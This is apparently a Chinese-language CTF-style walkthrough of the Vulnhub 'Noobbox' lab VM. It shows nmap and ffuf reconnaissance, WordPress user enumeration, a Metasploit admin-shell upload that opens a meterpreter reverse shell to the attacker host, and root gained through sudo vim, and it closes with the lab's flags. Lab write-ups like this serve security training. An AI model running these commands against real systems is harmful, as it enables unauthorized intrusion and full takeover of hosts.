Vulnhub: Noobbox

Vulnhub: Noobbox

---

2021-08-25  14:05:08

 

 

1.找到目标

确定目标为192.168.1.109。

┌──(root💀kali)-[~]
└─# nmap 192.168.1.1/24 -p80 
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-25 17:11 CST
Nmap scan report for 192.168.1.1
Host is up (0.00036s latency).

PORT   STATE SERVICE
80/tcp open  http
MAC Address: 80:8F:1D:FB:77:E0 (Tp-link Technologies)

Nmap scan report for 192.168.1.109
Host is up (0.00019s latency).

PORT   STATE SERVICE
80/tcp open  http
MAC Address: 08:00:27:1C:F6:FC (Oracle VirtualBox virtual NIC)

Nmap scan report for 192.168.1.150
Host is up (0.00019s latency).

PORT   STATE    SERVICE
80/tcp filtered http
MAC Address: 04:92:26:CF:9D:F1 (Asustek Computer)

Nmap scan report for 192.168.1.106
Host is up (0.000035s latency).

PORT   STATE  SERVICE
80/tcp closed http

Nmap done: 256 IP addresses (4 hosts up) scanned in 2.08 seconds

2.扫描并分析目标

 发现目标运行wordpress。

┌──(root💀kali)-[~]
└─# nmap -sC -A 192.168.1.109
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-25 17:13 CST
Nmap scan report for 192.168.1.109
Host is up (0.00023s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Apache2 Debian Default Page: It works
MAC Address: 08:00:27:1C:F6:FC (Oracle VirtualBox virtual NIC)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=8/25%OT=80%CT=1%CU=41701%PV=Y%DS=1%DC=D%G=Y%M=080027%T
OS:M=612609C0%P=x86_64-pc-linux-gnu)SEQ(SP=109%GCD=1%ISR=10A%TI=Z%CI=Z%II=I
OS:%TS=A)OPS(O1=M5B4ST11NW6%O2=M5B4ST11NW6%O3=M5B4NNT11NW6%O4=M5B4ST11NW6%O
OS:5=M5B4ST11NW6%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6
OS:=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW6%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O
OS:%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=
OS:0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%
OS:S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(
OS:R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=
OS:N%T=40%CD=S)

Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.23 ms 192.168.1.109

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.09 seconds

网站目录扫描。

┌──(root💀kali)-[~]
└─# nmap --script=http-enum 192.168.1.109  
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-25 17:16 CST
Nmap scan report for 192.168.1.109
Host is up (0.00018s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE
80/tcp open  http
| http-enum: 
|   /wordpress/: Blog
|   /wordpress/wp-login.php: Wordpress login page.
|_  /manual/: Potentially interesting folder
MAC Address: 08:00:27:1C:F6:FC (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 10.72 seconds

3.枚举wordpress用户

发现用户noobbox。

(也可以使用命令wpscan -e u --url 192.168.1.109/wordpress进行扫描）

┌──(root💀kali)-[~]
└─# nmap --script=http-wordpress-users --script-args=basepath=/wordpress/ 192.168.1.109
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-25 14:02 CST
Nmap scan report for 192.168.1.109
Host is up (0.00011s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE
80/tcp open  http
| http-wordpress-users: 
| Username found: noobbox
|_Search stopped at ID #25. Increase the upper limit if necessary with 'http-wordpress-users.limit'
MAC Address: 08:00:27:1C:F6:FC (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 0.57 seconds

 4.扫描网站图片

发现文件img.jpg，下载或者浏览器打开此图片，可得到信息5p4c3，猜测此为密码。

┌──(root💀kali)-[~]
└─# ffuf -c -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://192.168.1.109/FUZZ -e .jpg,.png,.jpeg,.gif -of html                     

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.3.1 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : http://192.168.1.109/FUZZ
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/common.txt
 :: Extensions       : .jpg .png .jpeg .gif 
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
________________________________________________

.hta                    [Status: 403, Size: 278, Words: 20, Lines: 10]
.htaccess               [Status: 403, Size: 278, Words: 20, Lines: 10]
.hta.gif                [Status: 403, Size: 278, Words: 20, Lines: 10]
.htaccess.png           [Status: 403, Size: 278, Words: 20, Lines: 10]
.htaccess.jpg           [Status: 403, Size: 278, Words: 20, Lines: 10]
.hta.jpeg               [Status: 403, Size: 278, Words: 20, Lines: 10]
.hta.png                [Status: 403, Size: 278, Words: 20, Lines: 10]
.hta.jpg                [Status: 403, Size: 278, Words: 20, Lines: 10]
.htpasswd.gif           [Status: 403, Size: 278, Words: 20, Lines: 10]
.htpasswd.jpeg          [Status: 403, Size: 278, Words: 20, Lines: 10]
.htpasswd.png           [Status: 403, Size: 278, Words: 20, Lines: 10]
.htpasswd.jpg           [Status: 403, Size: 278, Words: 20, Lines: 10]
.htpasswd               [Status: 403, Size: 278, Words: 20, Lines: 10]
.htaccess.gif           [Status: 403, Size: 278, Words: 20, Lines: 10]
.htaccess.jpeg          [Status: 403, Size: 278, Words: 20, Lines: 10]
img.jpg                 [Status: 200, Size: 4811, Words: 21, Lines: 29]
index.html              [Status: 200, Size: 10701, Words: 3427, Lines: 369]
manual                  [Status: 301, Size: 315, Words: 20, Lines: 10]
server-status           [Status: 403, Size: 278, Words: 20, Lines: 10]
wordpress               [Status: 301, Size: 318, Words: 20, Lines: 10]
:: Progress: [23430/23430] :: Job [1/1] :: 133 req/sec :: Duration: [0:00:04] :: Errors: 0 ::

5.获得meterpreter reverse shell

使用msfconsole进入控制台。

设置如下，并运行。

msf6 > use exploit/unix/webapp/wp_admin_shell_upload
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set rhosts 192.168.1.109
rhosts => 192.168.1.109
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set targeturi /wordpress
targeturi => /wordpress
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set username noobbox
username => noobbox
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set password 5p4c3
password => 5p4c3
msf6 exploit(unix/webapp/wp_admin_shell_upload) > run

[*] Started reverse TCP handler on 192.168.1.106:4444 
[*] Authenticating with WordPress using noobbox:5p4c3...
[+] Authenticated with WordPress
[*] Preparing payload...
[*] Uploading payload...
[*] Executing the payload at /wordpress/wp-content/plugins/nmyzoxoRan/eodxjTkwnQ.php...
[*] Sending stage (39282 bytes) to 192.168.1.109
[+] Deleted eodxjTkwnQ.php
[+] Deleted nmyzoxoRan.php
[+] Deleted ../nmyzoxoRan
[*] Meterpreter session 1 opened (192.168.1.106:4444 -> 192.168.1.109:45880) at 2021-08-25 14:58:40 +0800

meterpreter > sysinfo
Computer    : N00bBox
OS          : Linux N00bBox 4.19.0-14-amd64 #1 SMP Debian 4.19.171-2 (2021-01-30) x86_64
Meterpreter : php/linux
meterpreter > getuid
Server username: www-data (33)

6.获得用户noobbox下的flag。

meterpreter > cd /home
meterpreter > ls
Listing: /home
==============

Mode             Size  Type  Last modified              Name
----             ----  ----  -------------              ----
40755/rwxr-xr-x  4096  dir   2021-03-10 18:44:30 +0800  noobbox

meterpreter > cd noobbox
meterpreter > ls
Listing: /home/noobbox
======================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100644/rw-r--r--  220   fil   2021-03-06 15:25:32 +0800  .bash_logout
100644/rw-r--r--  3526  fil   2021-03-06 15:25:32 +0800  .bashrc
40755/rwxr-xr-x   4096  dir   2021-03-10 18:38:26 +0800  .local
100755/rwxr-xr-x  807   fil   2021-03-06 15:25:32 +0800  .profile
100600/rw-------  672   fil   2021-03-10 13:22:31 +0800  .viminfo
100644/rw-r--r--  47    fil   2021-03-10 13:31:14 +0800  user.txt

meterpreter > cat user.txt
USER FLAG : {e7028891afea8df6164a35880cc7e2e5}
meterpreter > 

 7.获得root权限

获得shell并使用python生成tty shell。

meterpreter > shell
Process 721 created.
Channel 0 created.
sh: 0: getcwd() failed: No such file or directory
sh: 0: getcwd() failed: No such file or directory
whoami
www-data
python -c 'import pty; pty.spawn("/bin/sh")'
sh: 0: getcwd() failed: No such file or directory
$ whoami
whoami
www-data
$ 

查看用户列表。可知noobbox可以使用rbash。

$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/bin/rbash
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
avahi-autoipd:x:105:113:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
noobbox:x:1000:1000:noobbox,,,:/home/noobbox:/bin/rbash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
mysql:x:107:115:MySQL Server,,,:/nonexistent:/bin/false
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
$ 

切换到用户noobbox并查看权限。

可知用户noobbox可以使用sudo 执行程序/usr/bin/vim。

$ su noobbox
su noobbox
Password: 5p4c3

shell-init: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
noobbox@N00bBox:$ sudo -l
sudo -l
[sudo] password for noobbox: 5p4c3

Matching Defaults entries for noobbox on N00bBox:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User noobbox may run the following commands on N00bBox:
    (ALL : ALL) /usr/bin/vim
noobbox@N00bBox:$ 

突破rbash限制。

noobbox@N00bBox:$ sudo  /usr/bin/vim -c ':!/bin/bash'

:!/bin/bash
shell-init: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
shell-init: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
root@N00bBox:.# 

进入根目录，可得到flag。

root@N00bBox:~# cd /root
cd /root
root@N00bBox:~# ls
ls
root.txt
root@N00bBox:~# cat root.txt
cat root.txt
ROOT FLAG : {a4c45279eaad84e5bb8ae0dfc5034400}
root@N00bBox:~# 

 

---